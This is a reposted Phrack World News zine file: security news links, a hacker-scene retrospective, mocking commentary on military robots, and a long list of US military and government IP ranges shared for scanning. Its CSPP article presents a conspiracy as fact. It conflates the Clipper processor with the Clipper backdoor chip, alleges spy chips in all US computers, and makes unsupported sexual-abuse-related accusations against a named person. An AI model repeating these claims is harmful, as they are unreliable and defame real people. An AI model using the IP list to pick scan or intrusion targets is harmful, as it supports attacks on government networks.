Kamis, 24 April 2008

Phrack World News [ IP Speedy World ]

==Phrack Inc.==

Volume 0x0c, Issue 0x41, Phile #0x03 of 0x0f

|=--------------------------------------------------------------------=|
|=-----------------------=[ Phrack World News]=-----------------------=|
|=----------------------------=[ by TCLH ]=---------------------------=|
|=--------------------------------------------------------------------=|


The Circle of Lost Hackers is looking for any kind of news related to
security, hacking, conference report, philosophy, psychology, surrealism,
new technologies, space war, spying systems, information warfare, secret
societies, ... anything interesting! It could be a simple news with just
an URL, a short text or a long text. Feel free to send us your news.

We didn't get any news from the Underground since our last phrack issue,
it means that one more time all the news reports are coming from
friends of our's.

It would be good if people who claim themself "underground" would send
us their news...

Is our underground dead?


1. Speedy Gonzales news
2. How is CSPP controlloing US education network?
3. Retrospective of underground scene
4. Killer robots
5. Meaningful IP addresses

--------------------------------------------


--[ 1.

*-[ The underground complot: when quebec scene takes too much LSD ]-

http://www.mindkind.org/mindkind1011.zip


*-[ "king of the carders" but busted ]-

http://www.theregister.co.uk/2007/09/18/max_butler_affidavit/


*-[ "secure area" and "Microsoft" don't belong in the same sentence ]-

http://www.stuff.co.nz/4269090a28.html


*-[ Being an ethical hacker is definitely not a good idea ]-

http://www.smh.com.au/news/security/police-swoop-on-hacker-of-the-year/2007
/11/15/1194766821481.html?page=2


*-[ When NSA teaches you how to hack ]-

https://www.hackerdegree.com

Do they read phrack? :)


*-[ When Phrack is a sponsor without its permission ]-

http://conference.hackinthebox.org/hitbsecconf2007kl/?page_id=65


*-[ Terrorism excuse is good for spying business ]-

http://www.corpwatch.org/article.php?id=14821

SAIC...


*-[ Entersect sounds like an interesting target...]-

http://www.washingtonpost.com/wp-dyn/content/article/2008/
04/01/AR2008040103049_pf.html


*-[ Want to work for MI6? ]-

http://news.bbc.co.uk/player/nol/newsid_6150000/newsid_6153000/
6153092.stm?bw=bb&mp=rm&nol_storyid=6153092&news=1


*-[ Flight "not" Simulator ]-

http://www.theregister.co.uk/2008/01/07/
boeing_dreamliner_hacker_concerns/


*-[ This design looks familiar...]-

http://hex90.org/


*-[ After hacking your brain: hacking your heart!]-

http://packetstormsecurity.org/papers/attack/icd-study.pdf



--[ 2. How is CSPP controlling US education network ]--
by dahut

http://www.mccullagh.org/db9/d30-32/kay-rosen-holleyman-1.jpg

The above picture shows Ken Kay, executive director of the Computer
Systems Policy Project on the left and Robert Holleyman, president and
CEO of the Business Software Alliance on the right.

CSPP (www.cspp.org) was created in 1989, and later on renamed as
Technology CEO Council. Bigger members are Applied Material, Dell, EMC,
HP, IBM, Intel, Motorola, NCR and Unisys. All these companies together
are generating 300 billion dollars of annual revenues.

The company was made on request of the US President, to promote
U.S. competitiveness through technology leadership. You can think
technology is for information technology. You are wrong. It's for
Intelligence technology.

The project is two steps. First is to invent a spy chip and
put it in every computer manufactured in US. So did Fairchild
(http://en.wikipedia.org/wiki/Fairchild_Semiconductor) by producing the
Clipper chip (http://en.wikipedia.org/wiki/Clipper_architecture).
The Clipper was designed with internal circuitry to encrypt information
and deliver backdoor capabilities, a little bit as the previous PROMIS
software was doing with Mainframe.

The Clipper was designed for RISC workstation. After a bankruptcy of
Fairchild, and seeing that Hitachi was interested to acquire the company,
the US government requested Intergraph to continue the project. So
they did by starting the production of a new UNIX workstation line,
named Interpro32 and running AT&T Unix operating system.

So, the operating system was containing code to activate the secret
part of the CPU, and access to users' data. The following declassified
document explains to the US administration how dangerous it could
be to continue to use the Clipper chip in conjunction with AT&T:
http://www.softwar.net/bush.html. CIA and NSA are involved in this
document.

Now that the main US chipset and computer manufacturers are in the
secrets of the CIA intelligence, let's go for step two.

In 1996, the US president Clinton did ask to create the CEO Forum,
managed by Ken Kay, to establish the best rules for the future
classrooms, assuming they will be well connected to the Internet, with
the best possible hardware. Members were Apple, Dell, IBM, Compaq, HP,
Sun... Next, the US government did ask again to Ken Kay in 2002 to
create the Partnership for 21st Century Skills to be at the center of US
K-12 education by building collaborative partnerships among education,
business, community and government leader (www.21stcenturyskills.org). It
was a follow up to the CEO Forum.

Members are:

* Adobe, AOL, Apple, AT&T, Cisco, Dell, Intel, Microsoft, SAP, Oracle...
* National Education Association, Ford Motor Company (?) and the US
Department of Education

Ken Kay is in charge of driving all these companies to install computer,
software and networks systems in all schools of USA, as well as dictating
the content of the courses!

Thinking back to the picture in front of this article, you can make
the connection between all software companies, the BSA company and Ken
Kay. Thanks to the clipper chip success, they all know how to watch you!
The cherry on the cake will be to tell you that Ken Kay is managing WWASP,
the largest world network of special establishment for "Teens In Crisis".
www.wwasp.com

http://en.wikipedia.org/wiki/World_Wide_Association_of_Specialty_Programs_
and_Schools

Many parents are complaining against the treatment methods employed by
WWASPS institutions. These methods are said to be controversial, as there
have been allegations of severe (sexual) abuse and torture by staff.
In 2004, during a testimony, Ken Kay stated that in his opinion, sexual
activity between staff members and students is "not necessarily abuse".
How do you explain that Ken Kay is controlling the whole US computer
industry, as well as the US education, and able to manage a galaxy of
establishments doing sexual abuses in its total acceptation? (See also
http://antiwwasp.com/)



--[ 3. Retrospective of The Underground scene ]--
by Duvel

Almost one year after the release of "A brief History of the Underground
Scene", it's now time to give some feedback. First of all, The Phrack
Staff and I would like to thank you all for your positive and negative
comments about this article. The goal of this article was not to
explain what the scene once was or what should be but more to provoke
the debate. And on this point the article was a success. Now it's time
to act.

About the negative comments that I had, I won't reply to each of one.
As you have probably seen, I didn't reply to any negative or positive
comments (except one at the beginning...my bad) I prefer let people
talk. But I was quite amused to see negative comments which for the
majority were on some insignificant points (speech recognition is not
datamining, this guy doesn't know subnets, underground pyramid is for
Holywood magazine or hacking tricks are too lame). It would be stupid
to reply to them. So I won't.

One of the thing that I am the most happy about is that a lot of young
generations of hackers have found this article interesting and found their
way through it. As you have probably seen, there is another article about
the Underground scene in this issue. Anonymous' opinion is opposite
to mine but if you read beetween the lines, we both go to the same
direction.

Of course it's important to understand the history of hacking (what
I tried to explain in my article) or how the underground died (what
Anonymous tries to explain in his article) but it's more important
to keep hackers alive. Even if the Underground won't ever be the same,
the passion is still there. It's this passion of hacking that should
stay alive.

I really hope that all people who gave constructive comments can
participate to the new Underground. A lot of people talk but don't do
anything. I've seen lots of interesting comment from people who want to
do something but at this stage we haven't seen anything from them. Are
these people too busy? Are these people just dreamers? Are these people
lacking required knowledge? Are these people....? I don't know.

But this message is for these people: please stop talking but try to bring
something to new generation of hackers.

They need you.

--[ 4. Killer robots ]--

My roomba can get lost under the dining room table, bumping off
the chair legs, over and over. There are many routes of escape,
but it rarely finds one. Only a true genius could turn this
remarkable example of AI into a killing machine.


http://blog.wired.com/defense/2007/10/roomba-maker-un.html
--------------------------------------------------------------------
The makers of the cuter-than-cute robotic vacuum cleaner are
rolling out a new machine: A big, fast-moving, semi-autonomous
'bot capable of killing a whole bunch of people at once.

Unlike other armed robots -- which are entirely remote-controlled
-- the Warriors are "being engineered with advanced software,
giving them the ability to perform some battlefield functions
autonomously."

At the same time, a key dimension to the Warrior X700 is its
ability to protect soldiers by firing weapons such as a machine
gun or 40mm explosive round.
--------------------------------------------------------------------


Bring in the big guns.


http://blog.wired.com/defense/2007/10/robot-cannon-ki.html
--------------------------------------------------------------------
We're not used to thinking of them this way. But many advanced
military weapons are essentially robotic -- picking targets out
automatically, slewing into position, and waiting only for a
human to pull the trigger. Most of the time. Once in a while,
though, these machines start firing mysteriously on their own.

During the shooting trials at Armscor's Alkantpan shooting range,
"I personally saw a gun go out of control several times," Young
says. "They made a temporary rig consisting of two steel poles on
each side of the weapon, with a rope in between to keep the
weapon from swinging. The weapon eventually knocked the pol[e]s
down."

Mangope told The Star that it "is assumed that there was a
mechanical problem, which led to the accident. The gun, which was
fully loaded, did not fire as it normally should have," he said.
"It appears as though the gun, which is computerised, jammed
before there was some sort of explosion, and then it opened fire
uncontrollably, killing and injuring the soldiers."

But the brave, as yet unnamed officer was unable to stop the
wildly swinging computerised Swiss/German Oerlikon 35mm MK5
anti-aircraft twin-barrelled gun. It sprayed hundreds of
high-explosive 0.5kg 35mm cannon shells around the five-gun
firing position.

By the time the gun had emptied its twin 250-round
auto-loader magazines, nine soldiers were dead and 11 injured.
--------------------------------------------------------------------


Can I play too?


http://blog.wired.com/defense/2007/12/new-killer-bot.html
--------------------------------------------------------------------
The stars: "a 25-year-old self-taught engineer named Adam
Gettings" and his "toy-like but gun-wielding robot designed to
replace human soldiers on the battlefield."

Gettings' company doesn't have much of an online signature -- not
even a website. But he does have some interesting partners,
including former Disney imagineer Terry Izumi (who cooked up this
video for the 'bot) and shotgun maker Jerry Barber (who provided
the firepower). Blackwater has also endorsed the product,
allegedly.
--------------------------------------------------------------------


Blackwater and Disney? Who could ask for better qualifications?
Oh, and there's this cool marketing video.


http://money.cnn.com/video/ft/#/video/fortune/2007/12/04/robotex.fortune


Robot wars, anyone?


http://blog.wired.com/defense/2007/05/top_war_tech_5_.html
--------------------------------------------------------------------

"The Baghdad bomb squad used their iRobots to decorate their
shop," Noah reported after an embed with an Army
ordnance-disposal unit a couple years back. "Not far away, at the
U.S. military's central robot depot for Iraq, the iRobots sat on
shelves, serenely gathering dust, while Foster-Miller's Talon
robots would come back, scarred and in pieces, after being chewed
up by a bomb."

The company noted that war zone "Robot Hospitals" are repairing
more than 400 bomb-damaged robots a week to put them back into
service.
--------------------------------------------------------------------


My bot can kick your bot's ass. Great. But how do they stand up
against humans?

Not the kind of humans that throw rocks at tanks, but the
thinking kind, like the ones that broke Israeli comms crypto
during the recent war in Lebanon.

Let's see what happens when it comes across a carpet stretched
over a pit. Or somebody throws a blanket over it, or spray paints
the camera lens, or fires IR lasers or very bright oLEDS at the
camera.

Once you have physical access to the thing, you own it. How hard
would it be to re-chip the thing and send it back against its
makers?

Can we test our killer-robot counter measures? Maybe. The
opportunity may soon be as close as your local pigsty.


http://blog.wired.com/defense/2007/08/armed-robots-so.html
--------------------------------------------------------------------
Armed robots -- similar to the ones now on patrol in Iraq -- are
being marketed to domestic police forces, according to the
machines' manufacturer and law enforcement officers.

Foster-Miller, maker of the armed SWORDS robot for military use,
is also actively promoting a similar model to domestic, civilian
police forces. The Talon SWAT/MP is a "robot specifically
equipped for scenarios frequently encountered by police SWAT
[special weapon and tactics] units and MPs [military police]," a
company fact sheet announces. It "can be configured with the
following equipment:

. Multi-shot TASER electronic control device with laser-dot
aiming.
. Loudspeaker and audio receiver for negotiations.
. Night vision and thermal cameras.
. Choice of weapons for lethal or less-than-lethal responses
- 40 mm grenade launcher - 2 rounds
- 12-gage shotgun - 5 rounds
- FN303 less-lethal launcher - 15 rounds.

In addition to the Massachusetts State Police, SWAT teams in
Houston, San Francisco, and Lubbock, TX all have the robots,
according to Foster-Miller spokesperson Cynthia Black.
--------------------------------------------------------------------


Finally, a legitimate excuse for Swatting.


http://en.wikipedia.org/wiki/Swatting
--------------------------------------------------------------------
In the field of Information Security, Swatting is an attempt to
trick an emergency service to dispatch an emergency response
team. The name derives from attempts to trick an emergency
services operator (a "911 operator") into dispatching a SWAT
(Special Weapons and Training) team to a location under false
pretense.
--------------------------------------------------------------------


What next?


http://blog.wired.com/defense/2007/11/black-knight.html
--------------------------------------------------------------------
We now know that there are robotic cars smart enough to drive
themselves around a city. The next step: give those vehicles
automatic weapons, of course.

Or the troops can stay just chill out, and let the thing drive
itself. The Knight uses "advanced robotic technology for
autonomous mobility," according to BAE. "This capability allows
the Black Knight to plan routes, maneuver on the planned route,
and avoid obstacles - all without operator intervention."
--------------------------------------------------------------------


http://blog.wired.com/defense/2008/01/israel-thinking.html
--------------------------------------------------------------------
So Israeli military leaders have begun early planning for a new,
robotic defense system, armed with enough artificial intelligence
that it "could take over completely" from flesh-and-blood
operators. "It will be designed for... autonomous operations,'
Brig. Gen. Daniel Milo, commander of Israel's air defense forces,
tells Defense News' Barbara Opall-Rome. And in the event of a
"doomsday" strike, Opall-Rome notes, the system could handle
"attacks that exceed physiological limits of human command."

How do you say "Skynet" in Hebrew, again?
--------------------------------------------------------------------


http://www.reuters.com/article/oddlyEnoughNews/idUST27506220080408?feedType=RSS&feedName=oddlyEnoughNews&rpc=22&sp=true
--------------------------------------------------------------------
Robots could fill the jobs of 3.5 million people in graying Japan
by 2025, a thinktank says, helping to avert worker shortages as
the country's population shrinks.

Caregivers would save more than an hour a day if robots helped
look after children, older people and did some housework, it
added. Robotic duties could include reading books out loud or
helping bathe the elderly.
--------------------------------------------------------------------


Don't drop the soap.


--[ 5. Meaningful IP addresses ]--

Here are some IP addresses that people send us...we haven't tried anything
so don't blame us. If you have more ranges feel free to share.

But before, the best IP list is probably the one on cryptome:

http://cryptome.org/nsa-ip-update14.htm


-----

RANGE 6
6.* - Army Information Systems Center

RANGE 7
7.*.*.* Defense Information Systems Agency, VA

RANGE 11
11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency,
Washington DC

RANGE 21
21. - US Defense Information Systems Agency

RANGE 22
22.* - Defense Information Systems Agency

RANGE 24
24.198.*.*

RANGE 25
25.*.*.* Royal Signals and Radar Establishment, UK

RANGE 26
26.* - Defense Information Systems Agency

RANGE 29
29.* - Defense Information Systems Agency

RANGE 30
30.* - Defense Information Systems Agency

RANGE 49
49.* - Joint Tactical Command

RANGE 50
50.* - Joint Tactical Command

RANGE 55
55.* - Army National Guard Bureau

RANGE 55
55.* - Army National Guard Bureau

RANGE 62
62.0.0.1 - 62.30.255.255 Do not scan!

RANGE 64
64.70.*.* Do not scan
64.224.* Do not Scan
64.225.* Do not scan
64.226.* Do not scan

RANGE 128
128.37.0.0 Army Yuma Proving Ground
128.38.0.0 Naval Surface Warfare Center
128.43.0.0 Defence Research Establishment-Ottawa
128.47.0.0 Army Communications Electronics Command
128.49.0.0 Naval Ocean Systems Center
128.50.0.0 Department of Defense
128.51.0.0 Department of Defense
128.56.0.0 U.S. Naval Academy
128.60.0.0 Naval Research Laboratory
128.63.0.0 Army Ballistics Research Laboratory
128.80.0.0 Army Communications Electronics Command
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency
128.102.0.0 NASA Ames Research Center
128.149.0.0 NASA Headquarters
128.154.0.0 NASA Wallops Flight Facility
128.155.0.0 NASA Langley Research Center
128.156.0.0 NASA Lewis Network Control Center
128.157.0.0 NASA Johnson Space Center
128.158.0.0 NASA Ames Research Center
128.159.0.0 NASA Ames Research Center
128.160.0.0 Naval Research Laboratory
128.161.0.0 NASA Ames Research Center
128.183.0.0 NASA Goddard Space Flight Center
128.190.0.0 Army Belvoir Reasearch and Development Center
128.202.0.0 50th Space Wing
128.216.0.0 MacDill Air Force Base
128.217.0.0 NASA Kennedy Space Center
128.236.0.0 U.S. Air Force Academy

RANGE 129
129.23.0.0 Strategic Defense Initiative Organization
129.29.0.0 United States Military Academy
129.50.0.0 NASA Marshall Space Flight Center
129.51.0.0 Patrick Air Force Base
129.52.0.0 Wright-Patterson Air Force Base
129.53.0.0 - 129.53.255.255 66SPTG-SCB
129.54.0.0 Vandenberg Air Force Base, CA
129.92.0.0 Air Force Institute of Technology
129.99.0.0 NASA Ames Research Center
129.131.0.0 Naval Weapons Center
129.139.0.0 Army Armament Research Development and Engineering Center
129.141.0.0 85 MISSION SUPPORT SQUADRON/SCSN
129.163.0.0 NASA/Johnson Space Center
129.164.0.0 NASA IVV
129.165.0.0 NASA Goddard Space Flight Center
129.166.0.0 NASA - John F. Kennedy Space Center
129.167.0.0 NASA Marshall Space Flight Center
129.168.0.0 NASA Lewis Research Center
129.190.0.0 Naval Underwater Systems Center
129.198.0.0 Air Force Flight Test Center
129.209.0.0 Army Ballistics Research Laboratory
129.229.0.0 U.S. Army Corps of Engineers
129.251.0.0 United States Air Force Academy

RANGE 130
130.40.0.0 NASA Johnson Space Center
130.90.0.0 Mather Air Force Base
130.109.0.0 Naval Coastal Systems Center
130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity
130.124.0.0 Honeywell Defense Systems Group
130.165.0.0 U.S.Army Corps of Engineers
130.167.0.0 NASA Headquarters

RANGE 131
131.3.0.0 - 131.3.255.255 Mather Air Force Base
131.6.0.0 Langley Air Force Base
131.10.0.0 Barksdale Air Force Base
131.17.0.0 Sheppard Air Force Base
131.21.0.0 Hahn Air Base
131.22.0.0 Keesler Air Force Base
131.24.0.0 6 Communications Squadron
131.25.0.0 Patrick Air Force Base
131.27.0.0 75 ABW
131.30.0.0 62 CS/SCSNT
131.32.0.0 37 Communications Squadron
131.35.0.0 Fairchild Air Force Base
131.36.0.0 Yokota Air Base
131.37.0.0 Elmendorf Air Force Base
131.38.0.0 Hickam Air Force Base
131.39.0.0 354CS/SCSN
131.40.0.0 Bergstrom Air Force Base
131.44.0.0 Randolph Air Force Base
131.46.0.0 20 Communications Squadron
131.47.0.0 Andersen Air Force Base
131.50.0.0 Davis-Monthan Air Force Base
131.52.0.0 56 Communications Squadron /SCBB
131.54.0.0 Air Force Concentrator Network
131.56.0.0 Upper Heyford Air Force Base
131.58.0.0 Alconbury Royal Air Force Base
131.59.0.0 7 Communications Squadron
131.61.0.0 McConnell Air Force Base
131.62.0.0 Norton Air Force Base
131.71.0.0 - 131.71.255.255 NAVAL AVIATION DEPOT CHERRY PO
131.74.0.0 Defense MegaCenter Columbus
131.84.0.0 Defense Technical Information Center
131.92.0.0 Army Information Systems Command - Aberdeen (EA)
131.105.0.0 McClellan Air Force Base
131.110.0.0 NASA/Michoud Assembly Facility
131.120.0.0 Naval Postgraduate School
131.121.0.0 United States Naval Academy
131.122.0.0 United States Naval Academy
131.176.0.0 European Space Operations Center
131.182.0.0 NASA Headquarters
131.250.0.0 Office of the Chief of Naval Research

RANGE 132
132.3.0.0 Williams Air Force Base
132.5.0.0 - 132.5.255.255 49th Fighter Wing
132.6.0.0 Ankara Air Station
132.7.0.0 - 132.7.255.255 SSG/SINO
132.9.0.0 28th Bomb Wing
132.10.0.0 319 Comm Sq
132.11.0.0 Hellenikon Air Base
132.12.0.0 Myrtle Beach Air Force Base
132.13.0.0 Bentwaters Royal Air Force Base
132.14.0.0 Air Force Concentrator Network
132.15.0.0 Kadena Air Base
132.16.0.0 Kunsan Air Base
132.17.0.0 Lindsey Air Station
132.18.0.0 McGuire Air Force Base
132.19.0.0 100CS (NET-MILDENHALL)
132.20.0.0 35th Communications Squadron
132.21.0.0 Plattsburgh Air Force Base
132.22.0.0 23Communications Sq
132.24.0.0 Dover Air Force Base
132.25.0.0 786 CS/SCBM
132.27.0.0 - 132.27.255.255 39CS/SCBBN
132.28.0.0 14TH COMMUNICATION SQUADRON
132.30.0.0 Lajes Air Force Base
132.31.0.0 Loring Air Force Base
132.33.0.0 60CS/SCSNM
132.34.0.0 Cannon Air Force Base
132.35.0.0 Altus Air Force Base
132.37.0.0 75 ABW
132.38.0.0 Goodfellow AFB
132.39.0.0 K.I. Sawyer Air Force Base
132.40.0.0 347 COMMUNICATION SQUADRON
132.42.0.0 Spangdahlem Air Force Base
132.43.0.0 Zweibruchen Air Force Base
132.45.0.0 Chanute Air Force Base
132.46.0.0 Columbus Air Force Base
132.48.0.0 Laughlin Air Force Base
132.49.0.0 366CS/SCSN
132.50.0.0 Reese Air Force Base
132.52.0.0 Vance Air Force Base
132.54.0.0 Langley AFB
132.55.0.0 Torrejon Air Force Base
132.56.0.0 - 132.56.255.255 9 CS/SC
132.57.0.0 Castle Air Force Base
132.58.0.0 Nellis Air Force Base
132.59.0.0 24Comm Squadron\SCSNA
132.60.0.0 - 132.60.255.255 42ND COMMUNICATION SQUADRON
132.61.0.0 SSG/SIN
132.62.0.0 - 132.62.255.255 377 COMMUNICATION SQUADRON
132.79.0.0 Army National Guard Bureau
132.80.0.0 - 132.80.255.255 NGB-AIS-OS
132.80.0.0 - 132.85.255.255 National Guard Bureau
132.82.0.0 Army National Guard Bureau
132.86.0.0 National Guard Bureau
132.87.0.0 - 132.93.255.255 National Guard Bureau
132.94.0.0 Army National Guard Bureau
132.95.0.0 - 132.103.255.255 National Guard Bureau
132.95.0.0 - 132.108.0.0 DOD Network Information Center
132.104.0.0 - 132.104.255.255 Army National Guard Bureau
132.105.0.0 - 132.108.255.255 Army National Guard Bureau
132.109.0.0 National Guard Bureau
132.110.0.0 - 132.116.255.255 Army National Guard Bureau
132.114.0.0 Army National Guard
132.117.0.0 Army National Guard Bureau
132.118.0.0 - 132.132.0.0 Army National Guard Bureau
132.122.0.0 South Carolina Army National Guard, USPFO
132.133.0.0 National Guard Bureau
132.134.0.0 - 132.143.255.255 National Guard Bureau
132.159.0.0 Army Information Systems Command
132.193.0.0 Army Research Office
132.250.0.0 Naval Research Laboratory

RANGE 134
134.5.0.0 Lockheed Aeronautical Systems Company
134.11.0.0 The Pentagon
134.12.0.0 NASA Ames Research Center
134.51.0.0 Boeing Military Aircraft Facility
134.52.*.* Boeing Corporation
134.78.0.0 Army Information Systems Command-ATCOM
134.80.0.0 Army Information Systems Command
134.118.0.0 NASA/Johnson Space Center
134.131.0.0 Wright-Patterson Air Force Base
134.136.0.0 Wright-Patterson Air Force Base
134.164.0.0 Army Engineer Waterways Experiment Station
134.165.0.0 Headquarters Air Force Space Command
134.194.0.0 U.S. Army Aberdeen Test Center
134.205.0.0 7th Communications Group
134.207.0.0 Naval Research Laboratory
134.229.0.0 Navy Regional Data Automation Center
134.230.0.0 Navy Regional Data Automation Center
134.232.0.0 - 134.232.255.255 U.S. Army, Europe
134.233.0.0 HQ 5th Signal Command
134.234.0.0 - 134.234.255.255 Southern European Task Force
134.235.0.0 HQ 5th Signal Command
134.240.0.0 U.S. Military Academy
136.149.0.0 Air Force Military Personnel Center

RANGE 136
136.178.0.0 NASA Research Network
136.188.0.0 - 136.197.255.255 Defense Intelligence Agency
136.207.0.0 69th Signal Battalion
136.208.0.0 HQ, 5th Signal Command
136.209.0.0 HQ 5th Signal Command
136.210.0.0 HQ 5th Signal Command
136.212.0.0 HQ 5th Signal Command
136.213.0.0 HQ, 5th Signal Command
136.214.0.0 HQ, 5th Signal Command
136.215.0.0 HQ, 5th Signal Command
136.216.0.0 HQ, 5th Signal Command
136.217.0.0 HQ, 5th Signal Command
136.218.0.0 HQ, 5th Signal Command
136.219.0.0 HQ, 5th Signal Command
136.220.0.0 HQ, 5th Signal Command
136.221.0.0 HQ, 5th Signal Command
136.222.0.0 HQ, 5th Signal Command


RANGE 137
137.1.0.0 Whiteman Air Force Base
137.2.0.0 George Air Force Base
137.3.0.0 Little Rock Air Force Base
137.4.0.0 - 137.4.255.255 437 CS/SC
137.5.0.0 Air Force Concentrator Network
137.6.0.0 Air Force Concentrator Network
137.11.0.0 HQ AFSPC/SCNNC
137.12.0.0 Air Force Concentrator Network
137.17.* National Aerospace Laboratory
137.24.0.0 Naval Surface Warfare Center
137.29.0.0 First Special Operations Command
137.67.0.0 Naval Warfare Assessment Center
137.94.* Royal Military College
137.95.* Headquarters, U.S. European Command
137.126.0.0 USAF MARS
137.127.* Army Concepts Analysis Agency
137.128.* U.S. ARMY Tank-Automotive Command
137.130.0.0 Defense Information Systems Agency
137.209.0.0 Defense Information Systems Agency
137.210.0.0 Defense Information Systems Agency
137.211.0.0 Defense Information Systems Agency
137.212.0.0 Defense Information Systems Agency
137.231.0.0 HQ 5th Signal Command
137.232.0.0 Defense Information Systems Agency
137.233.0.0 Defense Information Systems Agency
137.234.0.0 Defense Information Systems Agency
137.235.0.0 Defense Information Systems Agency
137.240.0.0 Air Force Materiel Command
137.241.0.0 75 ABW
137.242.0.0 Air Force Logistics Command
137.243.0.0 77 CS/SCCN
137.244.0.0 78 CS/SCSC
137.245.0.0 Wright Patterson Air Force Base
137.246.0.0 United States Atlantic Command Joint Training

RANGE 138
138.13.0.0 Air Force Systems Command
138.27.0.0 Army Information Systems Command
138.50.0.0 HQ 5th Signal Command
138.65.0.0 HQ, 5th Signal Command
138.76.0.0 NASA Headquarters
138.109.0.0 Naval Surface Warfare Center
138.115.0.0 NASA Information and Electronic Systems Laboratory
138.135.0.0 - 138.135.255.255 DEFENSE PROCESSING CENTERPERAL HARBOR
138.136.0.0 - 138.136.255.255 Navy Computers and Telecommunications
Station
138.137.0.0 Navy Regional Data Automation Center (NARDAC)
138.139.0.0 Marine Corps Air Station
138.140.0.0 Navy Regional Data Automation Center
138.141.0.0 Navy Regional Data Automation Center
138.142.0.0 Navy Regional Data Automation Center
138.143.0.0 Navy Regional Data Automation Center
138.144.0.0 NAVCOMTELCOM
138.145.0.0 NCTS WASHINGTON
138.146.0.0 NCTC
138.147.0.0 NCTC
138.148.0.0 NCTC
138.149.0.0 NCTC
138.150.0.0 NCTC
138.151.0.0 NCTC
138.152.0.0 NCTC
138.153.0.0 Yokosuka Naval Base
138.154.0.0 NCTC
138.155.0.0 NCTC
138.156.0.0 Marine Corps Central Design & Prog. Activity
138.157.0.0 - 138.157.255.255 Marine Corps Central Design & Prog.
Activity
138.158.0.0 Marine Corps Central Design & Prog. Activity
138.159.0.0 NCTC
138.160.0.0 Naval Air Station
138.161.0.0 NCTC
138.162.0.0 NCTC
138.163.0.0 NCTC
138.164.0.0 NCTC
138.165.0.0 NCTC
138.166.0.0 NCTC
138.167.0.0 NOC, MCTSSA, East
138.168.0.0 Marine Corps Central Design & Prog. Activity
138.169.0.0 NAVAL COMPUTER AND TELECOMM
138.169.12.0 NAVAL COMPUTER AND TELECOMM
138.169.13.0 NAVAL COMPUTER AND TELECOMM
138.170.0.0 NCTC
138.171.0.0 NCTC
138.172.0.0 NCTC
138.173.0.0 NCTC
138.174.0.0 NCTC
138.175.0.0 NCTC
138.176.0.0 NCTC
138.177.0.0 NCTS Pensacola
138.178.0.0 NCTC
138.179.0.0 NCTC
138.180.0.0 NCTC
138.181.0.0 NCTC
138.182.0.0 CNO N60
138.183.0.0 NCTC
138.184.0.0 NCTS
138.193.0.0 NASA/Yellow Creek

RANGE 139
139.31.0.0 20th Tactical Fighter Wing
139.32.0.0 48th Tactical Fighter Wing
139.33.0.0 36th Tactical Fighter Wing
139.34.0.0 52nd Tactical Fighter Wing
139.35.0.0 50th Tactical Fighter Wing
139.36.0.0 66th Electronic Combat Wing
139.37.0.0 26th Tactical Reconnaissance Wing
139.38.0.0 32nd Tactical Fighter Squadron
139.39.0.0 81st Tactical Fighter Wing
139.40.0.0 10th Tactical Fighter Wing
139.41.0.0 39th Tactical Air Control Group
139.42.0.0 40th Tactical Air Control Group
139.43.0.0 401st Tactical Fighter Wing
139.124.* Reseau Infomratique
139.142.*.*

RANGE 140
140.1.0.0 Defense Information Systems Agency
140.3.0.0 Defense Information Systems Agency
140.4.0.0 Defense Information Systems Agency
140.5.0.0 Defense Information Systems Agency
140.6.0.0 Defense Information Systems Agency
140.7.0.0 Defense Information Systems Agency
140.8.0.0 Defense Information Systems Agency
140.9.0.0 Defense Information Systems Agency
140.10.0.0 Defense Information Systems Agency
140.11.0.0 Defense Information Systems Agency
140.12.0.0 Defense Information Systems Agency
140.13.0.0 Defense Information Systems Agency
140.14.0.0 DISA Columbus Level II NOC
140.15.0.0 Defense Information Systems Agency
140.16.0.0 Defense Information Systems Agency
140.17.0.0 Defense Information Systems Agency
140.18.0.0 Defense Information Systems Agency
140.19.0.0 Defense Information Systems Agency
140.20.0.0 Defense Information Systems Agency
140.21.0.0 Defense Information Systems Agency
140.22.0.0 Defense Information Systems Agency
140.23.0.0 Defense Information Systems Agency
140.24.0.0 ASIC ALLIANCE-MARLBORO
140.25.0.0 Defense Information Systems Agency
140.26.0.0 Defense Information Systems Agency
140.27.0.0 Defense Information Systems Agency
140.28.0.0 Defense Information Systems Agency
140.29.0.0 Defense Information Systems Agency
140.30.0.0 Defense Information Systems Agency
140.31.0.0 Defense Information Systems Agency
140.32.0.0 Defense Information Systems Agency
140.33.0.0 Defense Information Systems Agency
140.34.0.0 Defense Information Systems Agency
140.35.0.0 Defense Information Systems Agency
140.36.0.0 Defense Information Systems Agency
140.37.0.0 Defense Information Systems Agency
140.38.0.0 Defense Information Systems Agency
140.39.0.0 Defense Information Systems Agency
140.40.0.0 Defense Information Systems Agency
140.41.0.0 Defense Information Systems Agency
140.42.0.0 Defense Information Systems Agency
140.43.0.0 Defense Information Systems Agency
140.44.0.0 Defense Information Systems Agency
140.45.0.0 Defense Information Systems Agency
140.46.0.0 Defense Information Systems Agency
140.47.0.0 - 140.47.255.255 Defense Information Systems Agency
140.47.0.0 - 140.48.255.255 DOD Network Information Center
140.48.0.0 - 140.48.255.255 Defense Information Systems Agency
140.49.0.0 Defense Information Systems Agency
140.50.0.0 Defense Information Systems Agency
140.51.0.0 Defense Information Systems Agency
140.52.0.0 Defense Information Systems Agency
140.53.0.0 Defense Information Systems Agency
140.54.0.0 Defense Information Systems Agency
140.55.0.0 Defense Information Systems Agency
140.56.0.0 Defense Information Systems Agency
140.57.0.0 Defense Information Systems Agency
140.58.0.0 Defense Information Systems Agency
140.59.0.0 Defense Information Systems Agency
140.60.0.0 Defense Information Systems Agency
140.61.0.0 Defense Information Systems Agency
140.62.0.0 Defense Information Systems Agency
140.63.0.0 Defense Information Systems Agency
140.64.0.0 Defense Information Systems Agency
140.65.0.0 Defense Information Systems Agency
140.66.0.0 Defense Information Systems Agency
140.67.0.0 Defense Information Systems Agency
140.68.0.0 Defense Information Systems Agency
140.69.0.0 Defense Information Systems Agency
140.70.0.0 Defense Information Systems Agency
140.71.0.0 Defense Information Systems Agency
140.72.0.0 Defense Information Systems Agency
140.73.0.0 Defense Information Systems Agency
140.74.0.0 - 140.74.255.255 Defense Information Systems Agency
140.100.0.0 Naval Sea Systems Command
140.139.0.0 HQ US Army Medical Research and Development Command
140.154.0.0 HQ 5th Signal Command
140.155.0.0 HQ, 5th Signal Command
140.156.0.0 HQ, 5th Signal Command
140.175.0.0 Scott Air Force Base
140.178.0.0 Naval Undersea Warfare Center Division, Keyport
140.187.0.0 Fort Bragg
